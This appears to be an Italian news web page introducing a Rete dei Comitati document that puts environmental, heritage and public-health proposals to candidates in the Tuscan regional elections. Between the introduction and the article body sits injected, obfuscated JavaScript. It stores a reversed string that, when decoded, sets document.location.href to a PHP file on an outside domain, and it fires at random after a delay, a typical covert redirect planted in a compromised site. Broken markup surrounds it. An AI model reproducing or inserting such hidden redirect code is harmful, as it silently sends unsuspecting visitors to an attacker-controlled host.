Regionali, Asor Rosa scrive a Enrico Rossi (e agli altri candidati): "Necessario cambiare"

image_pdfimage_print

Pubblichiamo il documento integrale che la IL TERRITORIO, I BENI CULTURALI, LA SALUTE[
qui è scaricabile il testo integrale in formato pdf]

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2010/02/retecomitati.jpg”>retecomitatiLa Rete dei Comitati per la difesa del territorio si rivolge alle forze politiche che si presentano alle prossime elezioni regionali per attirare la loro attenzione e aprire una discussione sui problemi riguardanti l’ambiente, il territorio, i beni culturali, la salute dei cittadini. Lo fa con questo documento, estremamente analitico e propositivo, un vero e proprio programma di governo per la prossima legislatura, in cui i rilievi critici e polemici sono sempre puntualmente bilanciati dalle proposte progettuali e operative, nello spirito d’un confronto aperto e non pregiudiziale con le forze politiche e con le Istituzioni.

La Rete non è nuova a iniziative del genere: ricorderemo soltanto i documenti presentati in occasione delle consultazioni politiche generali dell’aprile 2008 e delle consultazioni amministrative ed europee della primavera del 2009; oltre che il bel Convegno su “Le emergenze in Toscana. Crisi di un modello regionale dì sviluppo”, tenutosi a Firenze nell’estate del 2008. La situazione, come la Rete la vede e denuncia, è generalmente critica, in molti casi ben al di là del livello di guardia. Le prossime consultazioni regionali sono un’occasione estremamente importante per riaffermare la possibilità di un sano modello toscano, orientato allo stesso modo alla “conservazione” e allo “sviluppo “.

Occorre riconfermare e consolidare le buone intenzioni; correggere i molti errori pratici; imboccare con decisione una nuova strada fondata sull’attento controllo politico e tecnico delle decisioni e sulla effettiva partecipazione dei cittadini. A conclusione di questa fase di consultazioni, la Rete intende organizzare un vasto Convegno Regionale per verificarne i risultati, destinato a svolgersi prima delle prossime consultazioni.

0 Comments

  1. Pingback: Regionali, perUnaltracittà: “Enrico Rossi e la sua coalizione non ci rappresentano” | Notizie Firenze

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *